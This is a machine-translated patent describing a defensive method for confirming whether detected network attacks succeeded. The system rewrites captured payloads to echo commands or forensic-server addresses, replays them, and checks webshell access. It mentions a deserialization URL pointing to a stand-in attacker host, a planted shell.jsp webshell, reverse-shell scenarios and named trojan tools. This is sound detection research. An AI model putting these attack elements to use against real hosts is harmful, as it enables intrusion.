- the protection system parses and obtains key data from the data stream, and the protection system judges whether the key data in the data stream contains the attack signatures in the signature database, and if the key data in the data stream contains the attack signatures in the signature database , it is determined that there is an attack event in the data stream.
- Implementation mode 1 The protection system modifies the attack message, and uses the modified attack message as a test message.
- the protection system modifies the attack payload in the attack packet, and uses the packet containing the modified attack payload as the test packet.
- the protection system specifically modifies which content in the attack payload includes various methods, and the following describes with examples of Implementation Mode 1-1 and Implementation Mode 1-2.
- Implementation mode 1-1 The protection system replaces the attack command included in the attack message with a setting command.
- the setting command is used to trigger the command executor to respond to the execution result of the setting command.
- the above setting commands are preset in the protection system.
- the specific setting commands used by the protection system when replacing the attack command include multiple implementation methods. The following will illustrate with examples of Implementation Mode 1-1-1, Implementation Mode 1-1-2, and Implementation Mode 1-1-3.
- the setting command is a command with fixed echo content.
- a command with fixed echo content means that after the command is executed, the execution result returned by the host is fixed. For example, after the command is executed, the execution result returned by the host is the string carried by the command itself.
- the command with fixed echo content (that is, the above-mentioned setting command) adopted by the protection system is an echo command.
- the echo command is "echo predetermined character string", and the echo content of this echo command is the predetermined character string.
- the command with fixed echo content (that is, the above-mentioned setting command) adopted by the protection system is a print command, a printf command, an fprintf command or a sprintf command and the like.
- the setting command is a print command, such as "print test”
- the echo content of this command is test.
- the setting command is a command whose echo content is not fixed, but the echo format is fixed.
- a command with a fixed echo format means that after the command is executed, the format of the execution result returned by the host is fixed.
- the execution result returned by the host after the command is executed contains the specified string.
- the specified character string is, for example, a character string required to be returned by the executor in the syntax specification of the command, or the names of some parameters of the device.
- the command with a fixed echo format used by the protection system is the ifconfig command, and the execution result of the ifconfig command always includes "flags", “RUNNING”, “mtu”, “inet", “ether “ and “netmask” strings.
- the command is set to echo a command whose content and format are not fixed, but which satisfies a predetermined regular expression.
- the command echoed by the protection system that satisfies the regular expression is the dir command or the ls–l command.
- Implementation mode 1-2 The protection system replaces the address information included in the attack message with the address information corresponding to the forensics server.
- the forensic server refers to the device deployed in the protection system to collect forensics on the access behavior of the attacked host.
- the forensic server is separated from other devices in the protection system, and the forensic server is an independent device.
- the forensic server is co-located with other devices in the protection system.
- the forensic server is set in the security analyzer 103 , the probe 102 or the firewall 101 in FIG. 1 .
- the address information included in the attack packet is, for example, the address information of the attacker or the control end.
- the address information included in the attack packet includes at least one item of IP address, port number, domain name or URL.
- the address information corresponding to the forensic server in the test packet includes at least one of the IP address of the forensic server, the port number of the forensic server, the domain name of the forensic server, or the URL of the resource stored by the forensic server.
- the protection system replaces the IP address of the control end in the attack packet with the IP address of the forensic server, and replaces the port number of the control end in the attack packet with the The port number of the open port.
- the protection system replaces the URL of the malicious file in the attack packet with the URL of the HTTP resource stored on the forensics server.
- the protection system replaces the domain name of the attacker in the attack packet with the domain name of the forensic server.
- the above implementation modes 1-1 to 1-2 describe two kinds of content that the protection system may modify in the attack message.
- the protection system also modifies the source IP address in the attack message, replacing the source IP address in the attack message with the IP address of the protection system, so that the attacked host will respond to the message based on the replaced source IP address Sent to the protection system, not to the attacker or the control terminal.
- Implementation mode 2 The protection system generates a test message based on the identifier of the specified file included in the attack message.
- the specified file refers to the malicious file planted by the attacker on the attacked host by using the attack message.
- the attack packet includes the identifier of the specified file.
- the identifier of the specified file is, for example, the file name of the specified file.
- the attack packet also includes the URL of the specified file and the content of the specified file.
- the generation method of the specified file includes various situations, and the following uses examples to describe the situation 1 and the situation 2.
- Case 1 The attack message instructs the attacked host to create a specified file.
- the attack message instructs the attacked host to create a webshell file.
- the attacked host responds to the attack message and creates and saves the file indicated by the attack message locally on the attacked host, thereby generating the specified file.
- Case 2 The attack message instructs the attacked host to modify a local specified file.
- the attacked host has stored a specified file in advance, and the attack message instructs the attacked host to write malicious codes into the specified file saved on the attacked host.
- the attacked host responds to the attack message and writes malicious codes into the specified file, so that the specified file on the attacked host becomes a malicious file.
- the test message generated by the protection system is used to request access to the specified file.
- the test packet includes the identifier of the specified file and/or the URL of the specified file.
- the specific implementation of generating the test message includes: the protection system parses and obtains the URL from the data flow of the first attack event detected above, and obtains the file name from the attack payload; The URL and the file name are combined to obtain the URL of the specified file; the protection system constructs an HTTP request message containing the URL of the specified file as a test message.
- how the protection system detects a specific event or how to determine the success of an attack includes a variety of specific implementation methods, which will be described below with examples from implementation a to implementation d.
- Implementation method a The protection system judges whether the attack is successful based on the echo matching method.
- the attacked host after the protection system sends a test message to the attacked host, the attacked host generates a response message to the test message, and sends the response message to the protection system.
- the protection system receives the response message; the protection system parses the response message to obtain the execution result of the set command carried by the attacked host in the response message.
- the protection system judges whether the first attack event is a successful attack event according to the execution result carried in the response message.
- Implementation a specifically includes the following implementations a-1 to a-2.
- the specific event described above includes that the execution result sent by the attacked host is the same as the expected result of the set command.
- the specific events described above include that the execution result sent by the attacked host satisfies the regular expression corresponding to the setting command.
- Implementation mode a-1 The protection system saves the expected result of the setting command.
- the protection system judges whether the execution result carried in the response message is the same as the expected result corresponding to the setting command. If the execution result carried in the response message is the same as the expected result corresponding to the setting command, the protection system determines that the first attack event is a successful attack event.
- the expected result of the set command is the character string carried in the set command.
- the expected result of the set command is the string after the operator (such as echo, print, etc.) in the set command.
- the setting command is "echo predetermined character string"
- the expected result of the setting command is "predetermined character string”.
- the expected result of the setting command is a string that is required to be returned by the executor in the syntax specification of the command.
- the set command is "id"
- the expected result of the set command is the names of some parameters of the device.
- the set command is "ifconfig"
- the expected results of the set command include "RUNNING", “mtu”, “inet”, “ether”, and "netmask”.
- the expected results of the set commands are pre-configured on the guard system by the network administrator.
- Implementation mode a-2 The protection system saves the regular expression corresponding to the setting command.
- the protection system judges whether the execution result carried in the response message satisfies the regular expression corresponding to the setting command. If the execution result carried in the response message satisfies the regular expression corresponding to the setting command, the protection system determines that the first attack event is an attack success event.
- the setting command is "dir”
- the regular expression corresponding to the setting command is "' ⁇ d ⁇ 4 ⁇ / ⁇ d ⁇ 2 ⁇ / ⁇ d ⁇ 2 ⁇ s ⁇ 1,10 ⁇ d ⁇ 2 ⁇ : ⁇ d ⁇ 2 ⁇ s ⁇ 1,10 ⁇ DIR>'”.
- the setting command is “ls–l”
- the regular expression corresponding to the setting command is “[d ⁇ -][rwx ⁇ -] ⁇ 9 ⁇ ”.
- the regular expression corresponding to the setting command is pre-configured on the protection system by the network administrator.
- Implementation mode b The protection system determines whether the attack is successful based on the access behavior of the attacked host to the forensic server.
- the specific event described above includes the attacked host accessing the forensic server after the sending time point of the test message.
- the protection system obtains the accessed records of the forensics server after the time point when the test message is sent; the protection system queries whether there is a record corresponding to the attacked host in the accessed records of the forensics server, corresponding record, the protection system determines that the attacked host accesses the forensic server after the time point when the test message is sent.
- Accessed records refer to the historical records of the forensics server being accessed by other devices other than the forensics server. How the protection system obtains the accessed records of the forensic server includes multiple specific implementation methods, and the following uses examples of obtaining method 1 and obtaining method 2 to illustrate.
- the protection system obtains the access records of the forensics server from the access log provided by the forensics server.
- Access logs are files generated by the forensic server to record the actions of visitors.
- How to generate access logs includes multiple implementation methods. For example, the forensic server monitors whether the port on the device is accessed. The information such as the point and the port number of the accessed port is written into a file to obtain the access log.
- the forensics server provides an interface for querying the access log, such as a Representational State Transfer (REST) service interface.
- the protection system calls the interface provided by the forensic server to obtain the access log provided by the forensic server.
- REST Representational State Transfer
- the protection system detects the accessed records of the forensics server from subsequent traffic.
- the “subsequent" in the follow-up traffic is relative to the test packet, and the follow-up traffic refers to the traffic generated after the protection system sends the test packet.
- the protection system detects the accessed record of the forensic server from subsequent traffic based on the IP address of the forensic server and the IP address of the attacked host. For example, the protection system screens packets whose source IP address is the IP address of the attacked host and whose destination IP address is the IP address of the forensics server from subsequent traffic, and the protection system obtains the accessed information of the forensics server based on the filtered packets. Record.
- the protection system searches according to the IP address of the attacked host and the port number of the specified port on the forensic server.
- the IP address of the attacked host comes from the destination IP address field in the attack message
- the port number of the specified port refers to the port number used when modifying the attack message.
- the attacker A sends the above attack packet to the attacked host B, and the attack packet includes the IP address 1 of the attacker A and the port number 1 of the attacker A.
- the protection system replaces the IP address 1 in the attack packet with the IP address 2 of the forensic server, and replaces the port number 1 in the attack packet with the port number 2 of the forensic server.
- the protection system sends the replaced test packet to the attacked host B. Afterwards, the protection system queries whether there is an access record of the attacked host B to port number 2 on the forensic server according to the IP address of the attacked host B and the port number 2 of the forensic server.
- Implementation mode c The protection system determines whether the attack is successful by associating with other attack events.
- the specific event described above includes the second attack event associated with the specified file in the data flow related to the attacked host after the test message is sent.
- the protection system performs attack detection on the data flow related to the attacked host after sending the test message. If the second attack event associated with the specified file is detected, the protection system determines that the first attack event is a successful attack event.
- the above-mentioned second attack event is an attack event associated with the specified file other than the first attack event.
- the URL corresponding to the second attack event includes the file name of the specified file.
- the source IP address corresponding to the second attack event is the IP address of the protection system.
- the destination IP address corresponding to the second attack event is the IP address of the attacked host.
- the second attack event is, for example, a webshell event.
- the data flow used when detecting the second attack event includes a packet sent by the attacked host and/or a packet with the attacked host as a destination.
- the specified file is a file named shell.jsp as an example.
- the first attack event detected by the protection system is that the attacker instructs the attacked host to create the webshell file shell.jsp.
- the protection system sends an access request for the file shell.jsp to the attacked host. If the protection system subsequently detects an attack event related to the file shell.jsp, the protection system determines that the first attack event is an attack success event.
- Implementation mode d The protection system judges whether the attack is successful according to whether the specified file can be successfully accessed.
- the specific event described above includes the specified file being successfully accessed.
- the protection system judges whether the specified file can be accessed successfully. If the specified file can be successfully accessed, the protection system determines that the first attack event is a successful attack event.
- Implementation mode d-1 The protection system determines that the specified file can be successfully accessed according to the HTTP response code.
- the protection system obtains the response message sent by the attacked host to the test message from the data flow related to the attacked host after the test message; the protection system parses the response message to obtain the HTTP response code. If the HTTP response code is a response code indicating success, the protection system determines that the specified file is successfully accessed.
- the protection system determines whether the HTTP response code is 200. If the HTTP response code is 200, the protection system determines that the specified file is successfully accessed, and the protection system further determines that the first attack event is a successful attack event. As an alternative, the protection system judges according to the first digit of the HTTP response code. If the first digit of the HTTP response code is 2, that is to say, the HTTP response code is a 2xx success response code, the protection system determines that the specified file is successfully accessed, then the protection system will further determine that the first attack event is a successful attack event.
- Implementation mode d-2 The protection system determines that the specified file can be successfully accessed according to the existence of the set character string in the message body.
- the setting string is, for example, an echo identifier after the Trojan file is successfully connected.
- the setting character string is "->
- the network security solution provider characterizes the response message triggered by some sample Trojan files (such as one-sentence Trojans used by attack tools such as Chopper and XISE) after the connection is successful. Extract to obtain the above-mentioned setting character string, and then preset the above-mentioned setting character string in the protection system.
- the protection system obtains the response message sent by the attacked host for the test message from the data flow related to the attacked host after the test message; the protection system searches for the set character string in the message body of the response message, If there is a set character string in the message body of the response message, the protection system determines that the specified file is successfully accessed, and further determines that the first attack event is a successful attack event.
- the steps performed after the defense system judges that the attack is successful include various situations. For example, after the protection system determines that the first attack event is a successful attack event through the above embodiments, the protection system issues a handling strategy to quickly block network attack behaviors. As another example, the protection system executes the above-mentioned embodiment for the second attack event, and determines that the second attack event is an unsuccessful attack event, then the protection system generates and outputs alarm information, and the alarm information is used to notify the operation and maintenance personnel to confirm whether there is a related loophole.
- Fig. 3 is a frame diagram of a working flow of a protection system provided by this embodiment.
- Fig. 4 is a detailed flowchart of the work of a protection system 30 provided in this embodiment.
- the protection system 30 shown in FIG. 3 includes a probe 302 , a detection node 303 and a forensic server 304 .
- the protection system 30 shown in FIG. 3 is the protection system 10 in FIG. 1
- the probe 302 shown in FIG. 3 is the probe 102 in FIG. Node 303 is firewall 101 and/or security analyzer 103 in FIG. 1 .
- the probe 302 is used to extract network traffic as the input of the attack detection module 3031 in the detection node 303, that is, S401 in FIG. 4 .
- the probe 302 is deployed between "external: attacking host” (external refers to the Internet) and "internal: attacked host” (interior refers to the local area network), and the probe 302 collects the attacking host and the attacked host. Attack traffic transmitted between hosts, and send the traffic to the detection node 303 .
- Probes 302 include, without limitation, firewall probes or big data product probes.
- the detection node 303 includes an attack detection module 3031 , an echo matching attack success determination module 3032 and an active interaction attack success determination module 3033 .
- the attack detection module 3031 is used to invoke at least one threat detection algorithm to perform attack detection on the traffic sent by the probe 302, that is, S402 in FIG. 4 .
- the threat detection algorithm used by the attack detection module 3031 includes but not limited to deserialization attack detection, command injection detection and so on. After the attack detection module 3031 detects the attack, it sends the attack payload to the echo matching attack success determination module 3032 .
- the echo matching attack success determination module 3032 is used to determine whether there is a payload execution result in the response content of the server through a single flow to determine whether the attack is successful, that is, S403 in FIG. Send the attack payload to the active interactive attack success determination module 3033, and enter the process of active interactive attack success determination.
- the active interaction attack success determination module 3033 is used to determine whether the attack is successful based on the active interaction method, namely S404 in FIG. 4 .
- the active interactive attack success determination module 3033 replaces the attack payload, actively interacts with the attacked host, and obtains active interactive traffic.
- the active interactive attack success judgment module 3033 makes a successful judgment through fixed echo matching, access behavior to the forensics server 304, and other attack event associations. See the following embodiments for specific scenarios.
- the architecture shown in FIG. 3 is described by taking the division of the forensic server 304 and the detection node 303 as an example.
- the forensic server 304 and the detection node 303 are the same device, for example, the forensic server 304 is a functional module in the detection node 303 .
- the architecture shown in FIG. 3 is described by taking the attack detection module 3031 , the echo matching attack success determination module 3032 and the active interaction attack success determination module 3033 set on the same device as an example.
- the attack detection module 3031, the echo matching attack success determination module 3032 and the active interactive attack success determination module 3033 are set in different devices, for example, the attack detection module 3031 is set in a firewall, and the echo matching attack success determination module 3032 and The active interactive attack success determination module 3033 is set in the security analyzer.
- Example 1 and the example 2 illustrate the situation that the implementation mode 1 is adopted in S202.
- Example 3 is an illustration of the situation of adopting the implementation mode 2 in S202. Specifically, Example 1 describes the situation in which implementation 1-1 is adopted in S202 and implementation a is adopted in S204. Example 2 describes the situation in which implementation 1-2 is adopted in S202 and implementation b is adopted in S204. Example 3 describes the situation that implementation mode 2 is adopted in S202, and implementation mode c or implementation mode d is adopted in S204.
- Example 1 the attack is determined to be successful based on fixed echo matching after active interaction.
- Fig. 5 is a flowchart of a method for determining the success of an attack based on fixed echo matching after active interaction provided by this embodiment. As shown in FIG. 5 , the method in Example 1 further includes the following steps S501 to S503 on the basis of including S401 and S402 in FIG. 4 .
- the protection system parses the attack payload.
- the protection system extracts the attack command from the attack payload, and replaces the attack command with a command with a fixed echo.
- the protection system uses the modified payload to actively interact with the attacked host.
- the protection system analyzes the response message sent by the attacked host. If the content of the response message contains the set expected echo content, the protection system determines that the attack is successful.
- the payload of the attack message is as follows, and the attack command is "pwd".
- the defense system replaces the attack command "pwd” with the echo command "echo ognl_attack_test”.
- the protection system sends the command-replaced payload to the attacked host.
- the protection system parses the response message to determine whether the content of the response message contains "ognl_attack_test”. If the response message contains "ognl_attack_test", the protection system determines that the attack is successful.
- Example 2 after the active interaction, the attack success is judged according to the access behavior to the forensics server.
- Fig. 6 is a flow chart of a method for judging the success of an attack according to the access behavior to the forensics server after active interaction provided by this embodiment. As shown in Figure 6, this method can cover scenarios such as rebound shell, outgoing request, and SSRF.
- a forensic server (which may be the same device as the detection node) is set in the security analyzer. The network administrator configures the IP address of the forensic server, opens some ports of the forensic server, and sets the domain name of the forensic server. The forensics server opens web services, and the forensics server monitors and records accessed information.
- the method in Example 2 further includes the following steps S601 to S604 on the basis of including S401 and S402 in FIG. 4 .
- the protection system parses the attack payload, and extracts information such as IP address and port number, domain name, and URL contained therein.
- the protection system replaces the extracted information with the corresponding information of the forensics server (IP address, port number of any open port, domain name, URL).
- the protection system sends the modified payload to the attacked host.
- the forensics server monitors the port all the time, and records the access log.
- the protection system After the time window T (second level, for example, 10s) passes, the protection system obtains the accessed record from the forensic server, and queries whether there is an access record of the attacked host to the specified port on the forensic server. If there is an access record of the attacked host to the specified port on the forensic server, the protection system determines that the attack is successful.
- the time window T is a time period in which the modified payload is sent as the starting point and the duration is the set duration.
- the payload of a deserialized attack packet is as follows.
- the protection system extracts from the above payload that the URL controlled by the attacker is: rmi://A.B.C.D:6666/TouchFile, and the file corresponding to this URL often contains malicious code.
- A.B.C.D represents the IP address
- 6666 represents the port number.
- the protection system replaces A.B.C.D:6666 with the IP address of the forensic server and the open port 192.168.1.1:6000, and sends the modified payload to the attacked host.
- 192.168.1.1 is an example of the IP address of the forensic server
- 6000 is an example of the port number of the forensic server.
- the protection system determines that the attack is successful.
- Example 3 determines the success of the attack with regard to active access to created or modified files.
- Fig. 7 is a flow chart of a method for actively accessing created or modified files to determine the success of an attack provided by this embodiment. As shown in FIG. 7 , on the basis of including S401 and S402 in FIG. 4 , the method in Example 3 includes the following steps S701 to S703 .
- the protection system analyzes the attack payload, and identifies whether there is a file creation behavior or a file modification behavior.
- the defense system extracts the filenames of created or modified files from the attack payload.
- the protection system actively accesses the file corresponding to the file name.
- the protection system correlates with other attack events (such as webshell events). If the association is successful, the protection system determines that the attack is successful. Alternatively, the protection system determines whether the attack is successful according to the response code.
- the payload of the attack message is as follows.
- the guard extracts to the file name shell.jsp.
- the protection system actively accesses the file /example/shell.jsp on the attacked host.
- the protection system determines that the attack is successful.
- the time window T takes the time point of accessing the file on the attacked host as the starting point of the time and the time period as the set duration.
- the protection system judges whether the HTTP response code in the response message sent by the attacked host is 200, and if the HTTP response code is 200, it determines that the attack is successful.
- the problem that the echo is unpredictable means that the echo content of the attack command is variable.
- the echo is /root, and when the pwd command is executed in the opt directory, the echo is /opt;
- Another example is the whoami command, the echo of whoami command execution is the current user name, which may be root, admin or any custom name.
- the problem of unpredictable echo is solved by replacing the attack command with a command such as "echo ognl_test" with fixed echo content.
- Encoding bypass means that the attacker instructs the attacked host to encode the execution result of the command, and then respond to the encoded result.
- the command in the attack message is echo md5(test), and the echoed content is the md5 encrypted value of test "098F6BCD4621D373CADE4E832627B4F6".
- the command in the attack message is addHeader('X-Test',233*233), and the echoed content is X-Test:54289, which is a simple multiplication calculation.
- the problem with a long time window means that multi-flow association depends on the end of the data flow in the attack payload accessed by the attacked IP, or the probe device actively ages the session and then uploads the traffic content, and the aging time may be 10 minutes or longer , resulting in a very long time window.
- the time for the attacked IP to access the IP of the forensics server can be sensed in real time, for example, at the second level, thus solving the problem of long time windows.
- the problem of relying on the behavior of the attacker means that for the scenario of implanting the webshell file, it depends on the time point when the attacker accesses the webshell file, and this time is uncertain, and the attacker may not have accessed the file for a long time.
- the protection system actively accesses this file instead of the attacker, the problem of relying on the behavior of the attacker is solved.
- an easily identifiable attack payload is reconstructed according to the attack scenario, such as a command with a fixed echo, a fixed external IP ⁇ domain name, and a port number.
- Send the constructed attack payload through active interaction with the attacked host, and identify the success of the attack based on the fixed echo, access behavior to the forensic server, or webshell and other related attack events.
- the application scenarios of this embodiment are not limited to the illustrated scenarios based on echo matching and rebound shells, outgoing request scenarios, webshell implantation scenarios, etc. Active interactive methods to identify successful attacks are within the scope of protection of this application; in the embodiments
- the value of the associated time window T is only a reference value for implementation. As long as the idea is the same as the embodiment of the present application, the value of the time window T is different from the reference value in the embodiment, and it is also within the protection scope of the present application.
- FIG. 8 is a schematic structural diagram of an attack success identification device 800 provided in an embodiment of the present application.
- the device 800 shown in FIG. 8 includes a processing unit 802 and a sending unit 803 .
- the apparatus 800 further includes a receiving unit 801 .
- the device 800 shown in FIG. 8 is installed in the protection system 10 in FIG.
- the security analyzer 103 and the device 800 are realized by hardware in the firewall 101 or the probe 102 or the security analyzer 103 , or by executing corresponding software by the hardware in the firewall 101 or the probe 102 or the security analyzer 103 .
- the device 800 shown in FIG. 8 is set in the protection system in FIG. 2, the device 800 is used to support the protection system to execute the method shown in FIG.
- the protection system executes S201, S202, and S204, and the sending unit 803 is configured to support the protection system to execute S203.
- the processing unit 802 includes an attack detection module 3031 in FIG. 3 , an echo matching attack success determination module 3032 , an active interaction attack success determination module 3033 , and a port access monitoring and recording module.
- the sending unit 803 is configured to support the active interactive attack success determination module 3033 in FIG. 3 to send the modified attack payload to the attacked host.
- the device 800 shown in FIG. 8 is used to support the protection system to execute the method shown in FIG. 4, the receiving unit 801 is used to support the protection system to receive traffic in S401, and the processing unit 802 It is used to support the protection system to execute S402, S403 and S404.
- the device 800 shown in FIG. 8 is used to support the protection system to execute the method shown in FIG. Execute S502 to support the protection system.
- the device 800 shown in FIG. 8 is used to support the protection system to execute the method shown in FIG. 803 is used to support the protection system to execute S602.
- the device 800 shown in FIG. 8 is used to support the protection system to execute the method shown in FIG.
- the processing unit 802 is jointly used to support the protection system to execute S702.
- the device embodiment described in Figure 8 is only schematic.
- the division of the above units is only a logical function division.
- there may be other division methods for example, multiple units or components can be combined or integrated. to another system, or some features may be ignored, or not implemented.
- Each functional unit in each embodiment of the present application may be integrated into one processing unit, or each unit may physically exist separately, or two or more units may be integrated into one unit.
- Each unit in the device 800 is fully or partially implemented by software, hardware, firmware or any combination thereof.
- the processing unit 802 is implemented by a software functional unit generated by at least one processor 901 in FIG. 9 after reading the program code stored in the memory 902 .
- the processing unit 802 is processed by a part of at least one processor 901 in FIG. 9 (for example, a core in a multi-core processor Or two cores), or use programmable devices such as field-programmable gate array (field-programmable gate array, FPGA), or coprocessor to complete.
- the receiving unit 801 and the sending unit 803 are realized by the network interface 903 in FIG. 9 .
- FIG. 9 is a schematic structural diagram of a protection system 900 provided by an embodiment of the present application.
- the protection system 900 includes at least one processor 901 , a memory 902 and at least one network interface 903 .
- the protection system 900 shown in FIG. 9 is the protection system 10 in FIG. 1 .
- the processor 901 , memory 902 and at least one network interface 903 in the protection system 900 are distributed on the firewall 101 , the probe 102 or the security analyzer 103 in FIG. 1 .
- the protection system 900 shown in FIG. 9 is the protection system in FIG. 2, the protection system 900 is used to execute the method shown in FIG. 2, and the processor 901 is used to support the protection system Execute S201, S202, and S204, and the network interface 903 is used to support the protection system to execute S203.
- the processor 901 includes an attack detection module 3031 in FIG. 3 , an echo matching attack success determination module 3032 , an active interaction attack success determination module 3033 and a port access monitoring and recording module.
- the network interface 903 is used to support the active interactive attack success determination module 3033 in FIG. 3 to send the modified attack payload to the attacked host.
- the protection system 900 shown in FIG. 9 is used to execute the method shown in FIG.
- the protection system is supported to execute S402, S403 and S404.
- the protection system 900 shown in FIG. 9 is used to execute the method shown in FIG.
- the protection system executes S502.
- the protection system 900 shown in FIG. 9 is used to execute the method shown in FIG. Execute S602 to support the protection system.
- the protection system 900 shown in FIG. 9 is used to execute the method shown in FIG. 7, the processor 901 is used to support the protection system to execute S701 and S703, the network interface 903 and the 901 is jointly used to support the protection system to execute S702.
- the protection system 900 is a single physical computer.
- the protection system 900 includes multiple physical computers, and at least one processor 901 , memory 902 and at least one network interface 903 of the protection system 900 are distributed on different physical computers.
- protection system 900 is a cluster computer.
- the processor 901 is, for example, a general-purpose central processing unit (central processing unit, CPU), a network processor (network processor, NP), a graphics processing unit (graphics processing unit, GPU), a neural network processor (neural-network processing units, NPU) ), a data processing unit (data processing unit, DPU), a microprocessor, or one or more integrated circuits for implementing the solution of this application.
- the processor 901 includes an application-specific integrated circuit (application-specific integrated circuit, ASIC), a programmable logic device (programmable logic device, PLD) or a combination thereof.
- the PLD is, for example, a complex programmable logic device (complex programmable logic device, CPLD), a field-programmable gate array (field-programmable gate array, FPGA), a general array logic (generic array logic, GAL) or any combination thereof.
- complex programmable logic device complex programmable logic device, CPLD
- field-programmable gate array field-programmable gate array
- GAL general array logic
- the memory 902 is, for example, a read-only memory (read-only memory, ROM) or other types of static storage devices that can store static information and instructions, or a random access memory (random access memory, RAM) or a memory that can store information and instructions.
- Other types of dynamic storage devices such as electrically erasable programmable read-only memory (EEPROM), compact disc read-only memory (CD-ROM) or other optical disc storage, optical disc Storage (including Compact Disc, Laser Disc, Optical Disc, Digital Versatile Disc, Blu-ray Disc, etc.), magnetic disk storage medium, or other magnetic storage device, or is capable of carrying or storing desired program code in the form of instructions or data structures and capable of Any other medium accessed by a computer, but not limited to.
- the memory 902 exists independently and is connected to the processor 901 through an internal connection 904 .
- the memory 902 and the processor 901 are integrated together.
- Network interface 903 uses any transceiver-like device for communicating with other devices or communication networks.
- the network interface 903 includes, for example, at least one of a wired network interface or a wireless network interface.
- the wired network interface is, for example, an Ethernet interface.
- the Ethernet interface is, for example, an optical interface, an electrical interface or a combination thereof.
- the wireless network interface is, for example, a wireless local area network (wireless local area networks, WLAN) interface, a cellular network interface or a combination thereof.
- the processor 901 includes one or more CPUs, such as CPU0 and CPU1 as shown in FIG. 9 .
- protection system 900 optionally includes multiple processors, such as processor 901 and processor 905 as shown in FIG. 9 .
- processors such as processor 901 and processor 905 as shown in FIG. 9 .
- Each of these processors is, for example, a single-core processor (single-CPU), or a multi-core processor (multi-CPU).
- a processor herein alternatively refers to one or more devices, circuits, and/or processing cores for processing data such as computer program instructions.
- guard system 900 also includes internal connections 904 .
- the processor 901 , memory 902 and at least one network interface 903 are connected by an internal connection 904 .
- Internal connections 904 include pathways that carry information between the components described above.
- internal connection 904 is a single board or a bus.
- the internal connection 904 is divided into address bus, data bus, control bus and so on.
- protection system 900 also includes an input and output interface 906 .
- the input-output interface 906 is connected to the internal connection 904 .
- the input and output interface 906 is used to connect with an input device, and receive the commands or data involved in the above-mentioned method embodiments input by the user through the input device, such as setting commands, expected results of setting commands, and setting command correspondences.
- Input devices include, but are not limited to, keyboards, touch screens, microphones, mice, or sensory devices, among others.
- the input and output interface 906 is also used to connect with output devices.
- the input and output interface 906 outputs intermediate results and/or final results generated by the processor 301 executing the foregoing method embodiments through the output device, for example, information identifying whether the first attack event is a successful attack event.
- Output devices include, but are not limited to, monitors, printers, projectors, and the like.
- the processor 901 implements the methods in the foregoing embodiments by reading the program code 910 stored in the memory 902, or, the processor 901 implements the methods in the foregoing embodiments through internally stored program codes.
- the processor 901 implements the method in the foregoing embodiment by reading the program code 910 stored in the memory 902
- the memory 902 stores the program code for implementing the method provided in the embodiment of the present application.
- processor 901 For more details of the processor 901 implementing the above functions, please refer to the descriptions in the foregoing method embodiments, which will not be repeated here.
- a computer program product includes one or more computer program instructions, when the computer program instructions are loaded and executed by a computer, the computer is made to perform the above method implementation The method provided by the example.
- a chip including a memory and a processor, the memory is used to store computer instructions, and the processor is used to call and execute the computer instructions from the memory, so as to execute the methods provided by the above method embodiments.
- a reference to B means that A is the same as B or A is a simple variation of B.
- first and second in the description and claims of the embodiments of the present application are used to distinguish different objects, not to describe a specific order of objects, nor can they be interpreted as indicating or implying relative importance sex.
- first attack event and the second attack event are used to distinguish different attack events, not to describe a specific sequence of attack events, and it cannot be understood that the first attack event is more important than the second attack event.
- the above-mentioned embodiments may be fully or partially implemented by software, hardware, firmware or any combination thereof.
- software When implemented using software, it may be implemented in whole or in part in the form of a computer program product.
- the computer program product includes one or more computer instructions. When the computer program instructions are loaded and executed on the computer, all or part of the processes or functions described in accordance with the embodiments of the present application will be generated.
- the computer can be a general purpose computer, a special purpose computer, a computer network, or other programmable devices.
- the computer instructions may be stored in or transmitted from one computer-readable storage medium to another computer-readable storage medium, for example, the computer instructions may be transmitted from a website, computer, server or data center Transmission to another website site, computer, server, or data center by wired (eg, coaxial cable, optical fiber, digital subscriber line (DSL)) or wireless (eg, infrared, wireless, microwave, etc.).
- the computer-readable storage medium may be any available medium that can be accessed by a computer, or a data storage device such as a server or a data center integrated with one or more available media.
- the available medium may be a magnetic medium (for example, a floppy disk, a hard disk, or a magnetic tape), an optical medium (for example, DVD), or a semiconductor medium (for example, a Solid State Disk (SSD)).
- SSD Solid State Disk
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Signal Processing (AREA)
- Computer Networks & Wireless Communication (AREA)
- Computer Hardware Design (AREA)
- General Engineering & Computer Science (AREA)
- Computing Systems (AREA)
- Software Systems (AREA)
- Theoretical Computer Science (AREA)
- Physics & Mathematics (AREA)
- General Physics & Mathematics (AREA)
- Data Exchanges In Wide-Area Networks (AREA)
- Computer And Data Communications (AREA)
Abstract
本申请提供了一种攻击成功识别方法及防护系统,属于网络技术领域。本申请提供了一种基于主动交互来进行攻击成功识别的方法,通过在检测到攻击事件后,主动向受攻击主机发送一个测试报文,根据是否发生测试报文相关的特定事件,来判定检测到的攻击事件是否为攻击成功事件。由于该方法无需依赖于攻击报文中的攻击命令,也就无需依赖于攻击报文的响应报文来检测攻击是否成功,因此能够适用于攻击命令没有回显或者攻击命令的结果难以预期的情况,适用场景更加丰富,有助于从海量攻击告警中更有效地识别出执行成功的攻击事件。
Description
本申请要求于2021年12月24日提交的申请号为202111602601.6、发明名称为“攻击成功识别方法及防护系统”的中国专利申请的优先权,其全部内容通过引用结合在本申请中。
本申请涉及网络技术领域,特别涉及一种攻击成功识别方法及防护系统。
互联网每天都发生着大量的攻击。其中,大多数攻击属于失败攻击,例如工具批量扫描、载荷内容不符合目标系统、服务器不存在相应漏洞等。这些失败攻击无法真正对目标造成威胁,需要重点关注的攻击是成功攻击。有鉴于此,如何有效识别攻击是否成功已经成为本领域的研究热点。
相关技术利用服务端的响应内容来判断是否攻击成功。具体来说,防护设备基于特征库对通信对端之间传输的一个数据流中的报文进行攻击检测。如果防护设备检测出攻击事件,那么防护设备从产生攻击事件的报文的载荷内容(payload)中提取攻击命令,并确定攻击命令被服务端执行后的预期结果。之后,防护设备进一步确定上述数据流中来自于服务端的响应报文中是否实际包含上述预期结果。如果上述数据流中来自于服务端的响应报文中包含上述预期结果,则判定攻击成功。如果上述数据流中来自于服务端的响应报文中未包含上述预期结果,则判定攻击失败。
上述方法只适用于攻击命令的结果能够预期的情况,而在攻击命令的结果难以预期的情况下则无法应用。由此可见,该方法适用场景受限,无法有效地从海量攻击告警中识别出执行成功的攻击事件。
发明内容
本申请提供了一种攻击成功识别方法及防护系统,能够更有效地识别出执行成功的攻击事件。所述技术方案如下。
